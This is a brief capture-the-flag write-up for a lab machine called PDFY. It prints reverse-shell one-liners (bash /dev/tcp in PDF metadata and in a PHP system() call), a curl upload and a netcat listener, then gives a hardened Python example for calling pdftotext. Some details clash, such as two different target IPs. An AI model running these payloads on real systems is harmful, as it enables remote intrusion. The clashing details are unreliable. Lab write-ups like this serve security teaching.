PDFY HTB Writeup
Crafted PDF with title:
$ exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Upload → reverse shell as www-data.
The pdf_file.pdf uploaded earlier can be modified to contain a reverse shell.
$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf
The modified PDF file is then uploaded to the system.
$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload
A netcat listener is set up to receive the reverse shell.
$ nc -l -p 4444
The reverse shell is received, and the system is exploited.
PDFY is a web application that allows users to upload PDF files, extract metadata, and convert them to images. The application uses an unsafe system call to pdftotext and pdfimages, allowing command injection via crafted PDF metadata or filenames. Privilege escalation involves a misconfigured sudo permission for a custom PDF processing script.
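The unsafe call pattern described above, next to a hardened upload and conversion path. This is an added example, not the PDFY application's code: the function names, the uploads/ directory and the sample inputs are assumptions constructed for illustration.

```python
import secrets
import shlex
import subprocess
from pathlib import Path

# Constructed inputs for this example (not taken from the box).
HOSTILE_NAME = "report.pdf; echo INJECTED"
NOT_A_PDF = b"<?php echo 1; ?>"

def vulnerable_cmd(filename):
    # Unsafe pattern: client-controlled text interpolated into a shell string.
    return f"pdftotext uploads/{filename} -"

def shell_command_count(cmdline):
    # Count the commands a POSIX shell would run, splitting at ; & |.
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    count, in_command = 0, False
    for tok in lex:
        if tok and set(tok) <= set(";&|"):
            in_command = False
        elif not in_command:
            count, in_command = count + 1, True
    return count

def store_upload(data, upload_dir):
    # Check the PDF magic bytes and store under a server-generated name,
    # so the client's filename never reaches the filesystem or a command.
    if not data.startswith(b"%PDF-"):
        raise ValueError("upload is not a PDF")
    path = Path(upload_dir) / f"{secrets.token_hex(16)}.pdf"
    path.write_bytes(data)
    return path

def safe_argv(stored):
    # One argv element per argument; the absolute path cannot be read as an option.
    return ["pdftotext", str(Path(stored).resolve()), "-"]

def extract_text(stored):
    # No shell is involved (shell=False is the default for a list argv).
    # Anything read from the file, metadata included, is handled as data
    # and never placed in a command.
    done = subprocess.run(safe_argv(stored), capture_output=True, timeout=30, check=True)
    return done.stdout.decode("utf-8", "replace")

if __name__ == "__main__":
    print(shell_command_count(vulnerable_cmd("report.pdf")))  # 1
    print(shell_command_count(vulnerable_cmd(HOSTILE_NAME)))  # 2
```

The same argv-list approach applies to pdfimages. extract_text needs poppler's pdftotext on the PATH; the other functions run without it.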
Machine Name: PDFY
IP Address: 10.10.11.27
Difficulty: Medium
OS: Linux
Release Date: May 2024 (approx.)